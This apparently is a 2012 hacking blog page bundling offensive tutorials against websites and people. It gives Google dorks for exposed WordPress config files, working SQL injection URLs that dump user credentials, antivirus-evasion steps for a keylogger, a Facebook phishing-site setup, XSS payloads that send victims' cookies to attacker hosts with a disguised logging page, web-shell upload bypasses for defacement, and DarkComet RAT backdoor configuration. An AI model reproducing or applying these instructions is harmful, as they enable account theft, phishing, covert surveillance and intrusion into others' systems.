blogger

Friday, August 10, 2012

Get Wordpress MySQL Database by Google Dork

Get Wordpress MySQL Database by Google Dork

http://sysmox.com/blog/wp-content/uploads/2011/11/wordpress-attack.jpg
Get Wordpress MySQL Database by Google Dork 

its a bug in in some wodpress websites, it allow Hackers for Getting website's MYSQL database remotly,i Hope you must knows about MYSQL database in wordpress (wp-config.php file)

Dork : 
allinurl:wp-config.txt
so Google To Google.com and enther this Dork  allinurl:wp-config.txt 
and you'll Got MYSQL Databases
its look like 



<?php
// ** MySQL settings ** //
define('DB_NAME', 'dbpakde');    // The name of the database
define('DB_USER', 'pakde');     // Your MySQL username
define('DB_PASSWORD', 'tot111'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value

Live Demo : http://pakde.com/wp-config.txt

Mr.Dark Soul's Wordpress Blog Hacker

Mr.Dark Soul's Wordpress Blog Hacker

Its a Wordpress hacking software named  Mr.Dark Soul Wordpress Blog Hacker.its a Special Soft For Newbie who wanna hack WP blog .Scrreenshot is enough for teaching that how to use Mr.Dark Soul Wordpress Blog Hacker


Click On Images For Larger Size or its Image Links 
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

[Image: ywccU.gif]

[Image: dhn43.gif]

[Image: yJxc2.gif]


Click : Download

Another Eeasy Method of wordpress Blog Hacking

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.

[Image: untitled22.JPG]
The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=
Now replace the ?fbconnect_action=myhome&userid= with 
?fbconnect_action=myhome&amp;userid=
with this
?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

Now The URL will be Like this ..
www.site.com/?fbconnect_action=myhome&amp;userid=
with this
www.site.com/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.

[Image: untitled23.JPG]
he password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin

or
www.victrimsite.com/wp-login.php

[Image: untitled26.JPG]

Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website :)

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks


wordpress SQL Injection Hacks : Another Special Post :-) 

images (65×123)there are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress 
hacking with SQL injections, lets see


Cilck here to heck List of wordpress SQL Injections

How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=        Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..

Cpanel Hacking/Cracking Tutorial

Cpanel Hacking/Cracking Tutorial

Today we will Learn CPANEL cracking or Hacking  i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server. 
so lets start i am using cpanel.php [download it here]shell for cracking :) we need two things in cracking first one is usernames of the websites that are hosted on the server second is a good password dictonery [Get Passwords List Here]

so
 in first step :-
 grab the usernames of the websites using command ls /var/mail
 or use the "Grab the usernames from /etc/passwd" option in the shell
press the go button
  we have done from our side
  lets wait and watch ,if we have supplied good passwords then shell will show a message 
   " [~]# cracking success with username "xyz" with password "xyz"   "
  otherwise it will show 
   "[~] Please put some good passwords to crack username "xyz" :( "


  so chances of success depends on password list that we are using in cracking process 
[GUEST POST]

BSQL Hacker

BSQL Hacker : automated SQL Injection Framework Tool

It's easy to use for beginners and provide great amount of customisation and automation support for experienced users. Features a nice metasploit alike exploit repository to share and update SQL Injection exploits.
BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
http://madmikesamerica.com/wp-content/uploads/2010/09/computer-virus-iran-power-nuclear.jpgBSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

Videos
 New version is out, it's mostly bug fixes :

images (160×46)


 Screenshot




Key Features

  • Easy Mode
    • SQL Injection Wizard
    • Automated Attack Support (database dump)
      • ORACLE
      • MSSQL
      • MySQL (experimental)
  • General
    • Fast and Multithreaded
    • 4 Different SQL Injection Support
      • Blind SQL Injection
      • Time Based Blind SQL Injection
      • Deep Blind (based on advanced time delays) SQL Injection
      • Error Based SQL Injection
    • Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
    • RegEx Signature support
    • Console and GUI Support
    • Load / Save Support
    • Token / Nonce / ViewState etc. Support
    • Session Sharing Support
    • Advanced Configuration Support
    • Automated Attack mode, Automatically extract all database schema and data mode
  • Update / Exploit Repository Features
    • Metasploit alike but exploit repository support
    • Allows to save and share SQL Injection exploits
    • Supports auto-update
    • Custom GUI support for exploits (cookie input, URL input etc.)
  • GUI Features
    • Load and Save
    • Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
    • Visually view true and false responses as well as full HTML response, including time and stats
  • Connection Related
    • Proxy Support (Authenticated Proxy Support)
    • NTLM, Basic Auth Support, use default credentials of current user/application
    • SSL (also invalid certificates) Support
    • Custom Header Support
  • Injection Points (only one of them or combination)
    • Query String
    • Post
    • HTTP Headers
    • Cookies
  • Other
    • Post Injection data can be stored in a separated file
    • XML Output (not stable)
    • CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)

Hacking Facebook account password remotely using Keyloggers

Hacking Facebook account password remotely using Keyloggers and RAT's
Best method for advanced Hackers and my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don't aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger

does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password.


get keylogger here ...

Click Keylogger1

click  keylogger 2

FACEBOOK PHISHING SITE TUTORIAL

MAKING FACEBOOK PHISHING SITE TUTORIAL.



In my previous article I taught you people how to make a Phishing site. ( The articles is here ). Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

Step 6: Now Click on the Public_html.



Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected. 


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is Click here


=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it

PyLoris 3.2

What is so special about PyLoris?

http://i40.tinypic.com/96gppf.pngOne common method for performing a Denial of Service attack is called flooding. By rounding up a large number of computers, and telling them all to send or request a large amount of data from a server simultaneously. The purpose of these requests are not to gather large amounts of information; rather, the intent is merely to overwhelm the capabilities of the server. In a situation like this, a server could fail because of the bandwidth restrictions of the internet service provider, the memory limitations of the server, the lack of hard drive space to store the data being sent, or the inability of the CPU to process the data fast enough. The common thread between these four issues is that these are finite resources that have been given to the server. PyLoris is different from this form of attack because it does not prey of any physical resource; instead, it overwhelms an artificial resource--connections.
In order for prevent these types the aformentioned form of attacks, applications will limit their own utilization of system resources. If a process is going to use too much CPU, hard disk space, or memory, they will slow down and throttle requests--thereby ensuring the server's stability. Unfortunately, a number of web servers invent another form of resource--total connection count--with the idea that the connection count is linearly related to the utilization of other resources. This assumption is invalid; in the case of PyLoris, connections are relatively low in regards to CPU, memory, and network utilization. The offshoot of this is that web servers imposing restrictions on the total number of connections will reject connections well before they hit their physical resources' limits. Essentially developers have invented an artificial resource that causes a bottleneck far before any other physical limitation would.

What are the methods for mitigating this form of attack?

The typical responses to this attack come in various forms, but usually fall into one of three forms:
  1. Keeping a tally of connections for the number of connections made by a client. This counter would be incremented each time a connection is made, and decrememented once every specified time interval. Any client over a certain number would be flagged as an alert, while any client over a larger limit would be automatically banned for a specified time.
    • A high number of requests in a short amount of time from a single client would not be able to bring down your server
    • Large companies or clusters behind NAT would set off a DoS trigger
    • Doesn't protect against an attack like PyLoris + TOR
  2. Keeping track of the number of concurrent connections. A counter would be kept for each client, incremented on connect, and decremented on disconnect. Clients over a certain number would be flagged, while clients over a larger number would be automatically banned for a specified time.
    • A high number of concurrent connections from a single client would not be able to bring down your server
    • Large companies or clusters behind NAT would set off a DoS trigger
    • Doesn't protect against an attack like PyLoris + TOR
  3. Connection serialization. Web browsers have a configurable option for the number of connections to make per server. Circuits could incorporate a similar option; if the server is set to a maximum of 8 concurrent requests per client and a client makes 10, the server accepts all 10 requests, starts to fulfill the first 8, dealing with the extra 2 only after 2 connections have completed.
    • Protects against an attack like PyLoris.
    • Large companies or clusters behind NAT would still be able to use the service
    • Large companies or clusters behind NAT would be throttled
    • Abusers are not banned
    • Doesn't protect against an attack like PyLoris + TOR
  4. Put the web server behind another device that collects full requests and passes them on only when they are complete.
    • Protects against an attack like PyLoris + TOR
    • Large companies or clusters behind NAT would still be able to use the service
    • Abusers are not banned
    • Cost is more than the average website owner has to spend
    • Introducing more hardware could introduce more vulnerabilities

How could one remove these artificial limitations?

The unfortunate reality is that none of the aformentioned mitigating tactics actually address the problem of artificial limitations. In order to do this, developers will need to work on the following areas:
  1. Remove the artificial limitation: Developers should impose restrictions on the actual resource they are trying to protect, not arbitratily create an unrelated one.
  2. Reduce the memory and CPU footprint of inactive or incomplete connections: Windows limits TCP/IP connections by the amount of memory they use. A default installation of Linux sets the maximum number of file descriptors at 205199--orders of magnitude higher than the maximum number of allowed connections in the default installations of certain web servers will allow. If the resource utilization of a connection is on par with what the underlying Operating System uses, then the capabilities of these web servers will once again be restricted to the physical resources of the machine.
  3. Limit applications based on physical resources. A misconfigured web server with connections set too high can cause the entire operating system to crash. If developers were to restrict their applications' resources, many attacks would have a much smaller impact.

Why should I use PyLoris instead of Slowloris?

While the basic forms of PyLoris and Slowloris are functionally similar, PyLoris and Slowloris were developed with two entirely different motives in mind. Slowloris, developed by RSnake, was designed to showcase a particulary devastating form of Denial of Service attack. PyLoris, on the other hand, is designed to be a fully functional performance testing tool. With PyLoris you can:
  • Test the capability of your web server to handle incoming connections
  • Discover how your well your firewall policies work against DoS and DDoS attacks
  • Assess your Load Balancer or Content Service Switch handles high loads
  • Test the web servers of your embedded devices for flaws
  • Harness SOCKS proxies and TOR to audit your network infrastructure and tests vulnerabilities from multiple routes
  • Perform the Slowloris attack against non HTTP protocls
  • Build and distribute attack scripts with ScriptLoris and libloris

    Click : Download

Ardamax Keylogger 4.0 (latest) Free Serial Key and FUD

Ardamax Keylogger 4.0 (latest) Free Serial Key/

2
Ardamax Keylogger is a invisible computer monitoring application.We need monitoring softwares to record PC activity when we are away. You can also use them if you want to log the passwords when your friends log in through your computer.So, today I have decided to giveaway the serial of  Ardamax keylogger  3.9.1 worth USD 44.95



                            List of posts in Ardamax Series

1. Get Ardamax Keylogger 3.9/3.9.1 Serial ( We Are Here)

Ardamax Keylogger features:
The given below features are extracted from their official site.
  • Email log delivery 
  • FTP delivery 
  • Network delivery 
  • Clipboard logging 
  • Invisible mode 
  • Visual surveillance 
  • Chat monitoring
  • Security
  • Application monitoring 
  • Time/Date tracking
  • Powerful Log Viewer 
  • Small size 
Ardamax Keylogger 3.9.1/3.9 Free Serial Key
Ardamax+3.9+Free+Serial+registered

      you dont need to buy.

          click:Download
    install ardamax 4.0
  1. Right click the Ardamax icon on your system tray and click register.
  2. Enter the name and serial key provided in the downloaded file.
  3. Enjoy!!

    Hex Editing Ardamax Keylogger to Make it FUD

     Make Ardamax Keylogger  FUD. I had to choose this option because the crypters were no more FUD. People who doesn’t have patience may not continue because this post is rather lengthy.It took me 4-5 hours to make it FUD though!So lets begin..
     You will the following things-
    1.File Splitter
    2.Hex Editing Software
    3. Antivirus
    4. And of course the keylogger (in my case i am using ardamax)
     To make it easy for you all I have added the screenshots too.

    1. First split the keylogger into 4 parts.But how you gonna do that? Divide the bytes by 4 like below:
    hex+editing+ardamax
    2. The files will be split in the desired location:
    2

    3. Scan them and see which is infected. For me it was install.exe.1:
    3


    4.Split this file too and scan them with same process until you don’t get any detection.
    5.For me this was the last file that was detected! So I will now open the detected file with the Hex Editor like this:
    4

    5


    6. Antiviruses use signatures to detect keyloggers and other malwares. So the trick is here. We have to edit the signature to make it different and the antivirus won’t be able to detect it. It is not easy to find the signature and edit them. So you have to use the trial and error method until you get it right, however this is not enough, editing may interfere with the Remote File and can make it to not work.In my case I changed the following thing:
    6


    7. Save the file.Then scan it …
    8

    I made it FUD. Now click on Create_install to compile the file. You are done. If you are successful then comment with your file links.Hope you like my tutorial.


Project Neptune

Project Neptune


Upload Date: 10/5/2011
Last Update Date: 10/11/2011 (Curing update.)
Latest Version: v1.78
Project Neptune (1.7 MiB - 32165 downloads)

Many people may consider Project Neptune to be malicious or unethical, but it is absolutely not intended to be.  Still, there are those users that may use it in such ways, disregarding moral integrity.  Because of this, we, the staff of Project Neptune, would like to make this clear: We are absolutely not responsible for any of your actions involving this program.  You need to have permission from the owner of the computer you’re installing Project Neptune on.  Otherwise, you are breaching another person’s privacy, and you’re most likely breaching the laws of your country.
Many anti-viruses will detect Dissembler Lib.dll as a virus, categorized under a ‘hacking tool’ genre.  This file will not harm your computer in anyway, although we’ve made sure to make it unneeded to use Project Neptune.  Without it, however, you will not be able to change your file output’s icon, company name, copyright, etc.


Click: Download

Havij v1.15 (Cracked)

Havij v1.15 Advanced SQL Injection (Cracked)

http://img1.uploadhouse.com/fileuploads/14249/142496215284135c869a7908debddf0c913b2153.jpg

Version 1.15 2011/06/08

-Webknight WAF bypass added.

-Bypassing mod_security made better

-Unicode support added

-A new method for tables/columns extraction in mssql

-Continuing previous tables/columns extraction made available

-Custom replacement added to the settings

-Default injection value added to the settings (when using %Inject_Here%)

-Table and column prefix added for blind injections

-Custom table and column list added.

-Custom time out added.

-A new md5 cracker site added

-bugfix: a bug releating to SELECT command

-bugfix: finding string column

-bugfix: getting multi column data in mssql

-bugfix: finding mysql column count

-bugfix: wrong syntax in injection string type in MsAccess

-bugfix: false positive results was removed

-bugfix: data extraction in url-encoded pages

-bugfix: loading saved projects

-bugfix: some errors in data extraction in mssql fixed.

-bugfix: a bug in MsAccess when guessing tables and columns

-bugfix: a bug when using proxy

-bugfix: enabling remote desktop bug in windows server 2008 (thanks to www.thepiratesoft.org)

-bugfix: false positive in finding columns count

-bugfix: when mssql error based method failed

-bugfix: a bug in saving data

-bugfix: Oracle and PostgreSQL detection

click :
Download

Cross Site Scripting

[How to]Cross Site Scripting and cookie stealing
## Title: What is the Cross Site Scripting attack and how to use the cookie stealing attack.
## Written by: Hacking-tool
## for more info comment

In the film we see the usual guy with dark glasses and leather jacket, hacking at the keyboard, in less than a minute he has the access codes of a login system. Science fiction? No, all true!

There are various ways to attack a website. I list a few:
-XSS stands for cross-site scripting
-SQL-Injection, Injection of SQL commands in a site
-Blind Sql-Injection
-RFI or Remote File Inclusion
-LFI, Local File Inclusion
-DOS, short for Denial of Service
-DDoS, Distributed Denial of Service
-Format-string attacks

What is an XSS:
Unlike sql injection and other attacks on web applications, are vulnerable to this attack dynamic sites and not. The attack can be accomplished on any site that presents the use of JavaScript, VBScript, ActiveX, HTML and Flash. For those unfamiliar with these languages, just think that it's languages and applications that run directly from your Web browser (Internet Explorer, Netscape, Mozilla Firefox, Google Chrome, etc..). Then is a vulnerability that affects web sites with low control of variables. The XSS allows you to insert code to the browser level (often JavaScript code, but also php, html, etc.) in order to modify the source code of the webpage. Then, is possible of implementation, when a website takes as input data on which performs the operations (such as the internal search engine of the site but not only). This information is usually sent to the site via URL with a HTTP post method. These data, in non-secure sites, are displayed as they were posted by users. In this way anyone can get hold of sensitive data, such as cookies.
To do this we need only redirect our victim in a web page with the properly modified variables.
A very important thing to say is that there are two types of XSS:

Stored: in which an attacker is able to permanently modify the content of a web page, for example by entering a comment appropriately prepared for a post in a blog.
Reflected: thanks to which it is possible to produce a URL that uses the vulnerable site will alter the content of the pages so not permanent and only for HTTP requests that use URLs such specially forged.
This vulnerability is due to errors of programmers, who often neglect completely the validation of input information passed with HTTP requests.

The XSS exploit the operation of parameters badly declared:
Take for example this page in php:


Code:
<? / la variabile in esame è c
$var = $_GET ['c'];
echo $var;
?>

I said precisely that 'c' is a variable that is set up and printed on the page.
In URL level if we give the value 'hola' to this variable we will get:

Code:
http://www.site.it/test.php?c=hola


In the written page, then we find text: hola
From this we can understand that whatever value we give to c, this will be printed on the page.. and until they are words and numbers I would say everything is fine.. But if we will inject evil javascript code? Just think what would happen..
When an attacker run his code in the browser, the code will run in the security-context (or zone) for hosting the website. With this level of privilege, the code has the ability to read, edit and transmit sensitive data accessible from any browser.

A user may be vulnerable to XSS could be his account stolen (stealing cookies), his browser may be redirected elsewhere or possibly have a fraud of their data through the website they are visiting. Essentially, an XSS attack undermines the "trust" between a user and the website in question.

There are two types of cross-site scripting attacks: persistent attacks and attacks not persistent.

The non-persistent attacks require a user visits a specially modified link with malicious code. Once the link is accessed, the malicious code will run inside the browser.
The persistent attacks have malicious code in web pages that are hosted online for a period of time.
Examples of favorite target of malicious users is the post in web mail, web chat, etc.The user who is unaware of everything does not have to click on a link in particular but simply visit the web page message containing malicious code.

Structure XSS:
I would say that now there is one thing for sure: you must to have basic knowledge of html, js, etc to exploit this type of attack.

A typical attack, base, and known by all is the string:
Code:

<script>alert("XSS")</script>

analyze it:
 
<script>: opening code in javascript with the various commands;
 
alert: brings up a message alert (for who does'nt know it is a simple TextBox);
 
("XSS"): is the string that is displayed inside of Alert, do not have to be text, but also numbers (in this case it is not necessary the use of "")
 
</script>: javascript code closed;

Now we analyze this string:

Code:
<script>alert(document.cookie)</script>
 
<script> opening code in javascript with the various commands;

alert: pops up an alert

(document.cookie) instead of showing a string of text will display an alert with your cookie.

Filters:
The web master take defense very easy to overcome at times, others more complicated, and here comes the fun because it takes the imagination of each one of us to bring the so much desired alert!
These defenses are called "filters", or codes prohibiting the use of special characters. For someone less experienced may be considered completely solved, but not so! Take for example this filter:

Code:
<?
$var = $_GET ['c'];
$var = str_replace ("<script>", "script", $var);
echo $var;
?>

This will block the use of <script> and </ script>, but we should not necessarily use these.
There are various types of filters, one of which is the addslashes filter, which will place a apex before each slash (the "/") making it useless to our code. This is the structure of the filter:

Code:
<?
function addslashes ($var){
$var = str_replace ('"', '\"', $var);
$var = str_replace ("'", "\'", $var);
return $var;
}
?>

That would be inserted into a php page:

Code:
<?
$var = $_GET ['var'];
$var = addslashes ($var);
echo $var;
?>

Now you may ask. This as we overcome as we can not put any tip? A simple method would be to convert our code to ASCII.
A great site for other fantastic and ingenious XSS is: http://www.ha.ckers.org/xss.html
Now we have seen a series of commands, all harmless at first, but imagine if instead of Alert we redirect the webpage to a cookie grabber? Soon also will explain what is a cookie, how to apply it and what is the technique of cookie grabbing. continue ...

Persistent attacks:
Many web sites have message boards, tagboards, and more where you can leave one or more messages. A registered user is usually identified with a session ID cookie, so he can leave a message and be identified. If we inject malicious JavaScript code as a message, for example, we could also compromise the cookie who will read the message.
This is possible in case where the site/forum is vulnerable to XSS and injecting the command as a message visible to all:

Code:
<SCRIPT> document.location=‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?’+document.cookie </SCRIPT>

This we have just mentioned is a typical example of a persistent attack ..

Non-persistent attacks:
Some sites offer a view instead of customizable web, for example, when we carry out a site login and receive a welcome message can display some data in the URL, then visible to all. In the URL might read something like this:

Code:
http://site.example/index.php?sessionid=12345678&username=yourname

if a malicious user might have modified the URL properly, inserting JS code capable of stealing cookies, you may take control of an account, obviously masking the code like this:

Code:
http://site.example/index.php?sessionid=12345678&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E

Cookie Grabbing:
Technique of cookie grabbing.. What is it and how does it apply?
This technique is applicable at sites vulnerable to cross site scripting .. This vulnerability allows execution of arbitrary JavaScript code on the web application also allows the execution of malicious scripts acts to grabbing (take) cookies from the site itself...

Example of malicious JavaScript code could be:

Code:
<script language="JavaScript"> window.location="http://www.sitomio.net/logs.php?cooked="+document.cookie </script></span></p> <span style="color: #000000;">
What would be the url:

Code:
http://www.vulnerablesite.net?Keywords=%3Cscript+language%3D%22JavaScript%22%3E+window. ​ location%3D%22http%3A%2F%2Fwww.mysite.net%2Flogs.php%3Fcooked%3D%22%2Bdocument.c ​ookie+%3C%2Fscript%3E

What happens? We read http://www.vulnerablesite.net is the site vulnerable to XSS, keywords is the variable vulnerable and http://www.mysite.net is where the vulnerable site is redirect to grabbing the cookies, exactly in logs.php files that we create:

Code:
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<?php
$capo = "</span><br /><span style="color: #000000;"> ";
$_GET['data'] = $data; //prende ciò che sta dopo "data" nell'url e lo mette nella variabile "data"
$fh = fopen("cookies.txt",'a+'); //setta in "fh" le condizioni per aprire il file cookies.txt
fwrite($fh, "$data"); //apre il file cookies.txt o lo crea se non esiste e ci scrive la variabile "data"
fwrite($fh, "$capo");//va a capo
fclose($fh); //chiude il file
?>
<p>The requested URL was not found on this server.</p>
</body>
</html>
As you can see, all processes are hidden, and when the page simply we will display "The requested URL was not found on this server", pretending a fake 404 not found, and in the cookie.txt will be saved all cookies of victims.

Upload XSS:
Here's another neat trick to exploit the XSS: D

We open a picture .gif with our beloved notepad and delete everything that is inside and edit it for example with this:

Code:
GIF89a<script>alert(“XSS”)</script>

Close, save and upload the file, is will appear your alert!

Here's what to put before the script to make sure that the image remains in its extension:

-PNG = ‰PNG
-GIF = GIF89a
-JPG = ÿØÿà JFIF
-BMP = BMFÖ

As you can see we used GIF89 before the string to get the iimagine extension. Gif

How to Deface Website


Here I will show you how to deface a website



First of all you will need shell. I will give you modified c100 shell which I use and it is undetectable.

Download Link: Shell here

First when you download c100.php you will need to edit it with notepad. And set your Username and Password, so that only one who know user/pw can access shell and website.

[Image: shelasd.jpg]

Thee green part, Username and passowrd edit as you like. But the md5 pass must be crypted. For that you go to
Crypo.com - Here you will make your pas MD5
Image has been scaled down 10% (870x542). Click this bar to view original image (960x598). Click image to open in new window.
[Image: md5pw.jpg]

So on crypo.com you write the password you writed in c100.php in my case it is hakforums and for that I get this MD5 password, copy it and paste in our shell c100.php
Code:
20e1f7d5481da19bf736569eb047e20c

So in my case c100 should look like this


Code:
$login = "Hacking-tool"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "hakforums"; //password
$md5_pass = "b54f268a2badf26e2499631f37d7b12e"; //md5-cryped pass. if null, md5($pass)

When you do that, save it and now find on website place where you can upload some file. Sometimes the website will block .php extension so you will have to bypass it. First open your shell with notepad and then Save As and change the extension to one of these
Code:
shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;


If website doesn't have any place where you can upload files, but have place where you can add news or new event or something you can use meta http-equiv to make redirection from website to your deface page. You do that by adding this code in news
Code:
<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

Once you find admin panel upload your shell, if you can't upload .php directly upload it with modified extensions as I stated above.

[Image: neasd.jpg]

After you uploaded it find the link where you uploaded it, example if you uploaded it in images then it will be in site/images/c100.php After you enter the link the new Pop up windows will apear and it will ask you for login. Here you write your username and password your wrote in c100.php. After that you should get in website.


Sometimes simply extension hiding will not work so you will have to use one addon for firefox Live HTTP Headers Install it and then hide shell extension, go to the upload section. Open Live HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hided .php.jpg extension into the .php. So as we uploaded the shell and opened the Live HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.


[Image: 124124g.jpg]

After that you will have to find once again the same line of code which shows that you have uploaded shell. So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.

[Image: 12412412414.png]

It should take you to the shell screen and if it doesn't you will have to find manually where shell has been uploaded and go to that link. Niote: This doesn't work for every website but work for a lot. Now you are in website.

[Image: unlednzl.jpg]

Find main index.php and edit it with your deface page source code, and click save. Thats it

Happy defacing

DarkComet

DarkComet Rat's used in Syrian Conflict?

On February 17th the CNN published an interesting article, where some Syrian’s regime opponents claimed that the government was using a Trojan to monitor and disrupt the protestor’s network. Apparently the regime has been using a well-known social engineering technique: impersonate a trusted person then attack from the inside. It is not possible to confirm the story but this is what is being told by the opponents of the regime: apparently one of the protestors was brought to jail and promptly forced to hand over his passwords. Those passwords were used later on to access his Skype account and infiltrate the network of protestors, spreading via chat a program containing some malicious code. In other cases the same file was delivered as a Facebook Chat security update, together with a Facebook icon, while some other people claim that it was also sent by mail. Whatever the means, the common sign among all the stories is that this file, after being opened, did simply nothing and even the antivirus didn’t complain at all.

Preliminary Analysis

We don’t have a lot of elements for the analysis; but we can speculate just a bit: first of all the malware wasn’t delivered through an exploit but as a plain executable file, so apparently we are not dealing with a high-profile attack. Then in one case the malware file wasn’t even embedded with another application, thus reinforcing the hypothesis that the attack, after all, might have been setup in a quick and dirty way. It wouldn’t be too unrealistic to assume that the malware wasn’t even coded by the government but acquired from the “black market”, or even worse on the internet as a commercial or free tool. Fortunately TrendMicro was able to gather two different samples delivered to the opponents of the regime, they found out that both of them were different versions of the popular DarkComet RAT. The first was a DarkComet v5 plain executable, the second one was DarkComet v3.3 embedded into a decoy MAC Changer application. This might also indicate that the government started monitoring the contesters from the very beginning of the uprising; in fact DarkComet v3.3 was released at the end of April 2011, just a month after the demonstrations begun. Did the government really choose DarkComet to fight the opposition? Apparently so, and for us it’s a good opportunity to dissect this program to gain a deeper knowledge, and possibly to be able to detect and remove it.

DarkComet v5

First of all we need to download DarkComet from its website: , it comes as a package, no installation is required, simply unpack it somewhere and run DarkCometRAT.exe. Clearly we’ll have to split the configuration in two parts: the client and the server, optionally we can also configure the downloader module, that’s the main vector used to grab the custom executable from the web, and apparently it’s the same module that’ been used in Syrian attacks, so it may be worth to take a look at it. It might also be a nice idea to run all the components inside a Virtual Machine… You know, just in case…

Configuring the Server Module

After opening the client just click on the main menu and open the Server module section:
This is the place where we’ll setup the backdoor; we are going to use a plausible configuration. So first of all set your password, it will be used to encrypt all the traffic, and this is really important. Generate the names used by the backdoor for the mutex and server id, then, just to make our reverse engineering session more interesting, activate the FWB. Choose the network IP address where you want the data to be sent by the infected target, the port (885 in our case), and then configure the Module Startup parameters:
You’re allowed to choose among several predefined locations: documents directory, favorites folder, desktop, windows directory, cookie path etc… In this case the path and final filename are not important, we’re not doing forensics and we know exactly what to look for, so for your own convenience you can use something easy to remember. Just don’t forget to check the Persistence Installation option. Decide whether or not you want to show a message upon backdoor’s startup (I decided not to) and jump to the Module Shield section:
